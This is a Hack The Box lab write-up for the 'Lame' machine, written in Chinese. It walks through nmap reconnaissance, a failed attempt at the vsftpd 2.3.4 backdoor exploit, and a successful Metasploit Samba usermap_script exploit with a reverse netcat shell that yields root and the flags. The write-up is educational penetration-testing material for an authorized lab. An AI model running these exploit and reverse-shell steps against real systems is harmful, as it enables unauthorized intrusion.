--- # System prepended metadata title: Hack The Box - Lame Writeup tags: [Samba, Hack The Box] --- # Hack The Box - Lame Writeup Writeup for the box Lame in Hack The Box. ## Box Info | OS | Difficulty | | ----- |:---------- | | Linux | Easy | ## Recon ### Nmap Basic scan: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame] └─$ sudo nmap 10.10.10.3 -oA nmap/initial Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 20:57 CST Nmap scan report for 10.10.10.3 Host is up (0.12s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds ``` Scan with default script and detect version: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame] └─$ sudo nmap -sC -sV 10.10.10.3 -p21,22,139,445 -oA nmap/lame Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 20:59 CST Nmap scan report for 10.10.10.3 Host is up (0.18s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.16.5 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_clock-skew: mean: 1h50m11s, deviation: 2h49m45s, median: -9m51s |_smb2-time: Protocol negotiation failed (SMB2) | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | Computer name: lame | NetBIOS computer name: | Domain name: hackthebox.gr | FQDN: lame.hackthebox.gr |_ System time: 2024-10-10T08:50:20-04:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.28 seconds ``` ## Vsftpd 2.3.4 搜尋後可以發現 ftp 版本 vsftpd 2.3.4 有 Command Execution 漏洞: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame] └─$ searchsploit vsftpd 2.3.4 ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results ``` ### Metasploit 使用 metasploit 嘗試攻擊: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame] └─$ msfconsole -q msf6 > search vsftpd 2.3.4 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor msf6 > use 0 [*] No payload configured, defaulting to cmd/unix/interact ``` ```bash msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT no The local client port Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.3 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 21 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic View the full module info with the info, or info -d command. ``` 而設定並執行之後會發現攻擊沒有成功: ```bash msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run [*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.10.10.3:21 - USER: 331 Please specify the password. [*] Exploit completed, but no session was created. ``` ### Python script 改成使用 searchsploit 中看到的另一個 python script 來進行嘗試: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame] └─$ cp /usr/share/exploitdb/exploits/unix/remote/49757.py . ``` 執行後會發現一樣沒有成功,script 會持續 hanging: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame] └─$ python3 49757.py /home/parallels/Documents/Hack The Box/Lame/49757.py:11: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13 from telnetlib import Telnet usage: 49757.py [-h] host 49757.py: error: the following arguments are required: host ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame] └─$ python3 49757.py 10.10.10.3 /home/parallels/Documents/Hack The Box/Lame/49757.py:11: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13 from telnetlib import Telnet ``` ## Samba 3.0.20 接著搜尋後會發現 Samba 3.0.20 同樣看起來有 Command Execution 的問題: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame] └─$ searchsploit samba 3.0.20 ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py ------------------------------------------------------------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results ``` ### Metasploit 再度嘗試用 metasploit 攻擊: ```bash ┌──(parallels㉿kali)-[~/Documents/Hack The Box/Lame] └─$ msfconsole -q msf6 > search samba 3.0.20 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script msf6 > use 0 [*] No payload configured, defaulting to cmd/unix/reverse_netcat ``` 設定相關參數: ```bash msf6 exploit(multi/samba/usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT no The local client port Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.10.3 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 139 yes The target port (TCP) Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.16.5 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic View the full module info with the info, or info -d command. ``` ```bash msf6 exploit(multi/samba/usermap_script) > run [*] Started reverse TCP handler on 10.10.16.5:4444 [*] Command shell session 1 opened (10.10.16.5:4444 -> 10.10.10.3:34049) at 2024-10-10 23:34:14 +0800 which python python2 python3 /usr/bin/python python -c "import pty;pty.spawn('/bin/bash')" root@lame:/# ``` 成功拿到 root 權限,接著就可以去讀取 flag 了。 ### user.txt ```shell root@lame:/home/makis# cat user.txt cat user.txt 990f046d************************ ``` ### root.txt ```shell root@lame:/root# cat root.txt cat root.txt e5035455************************ ```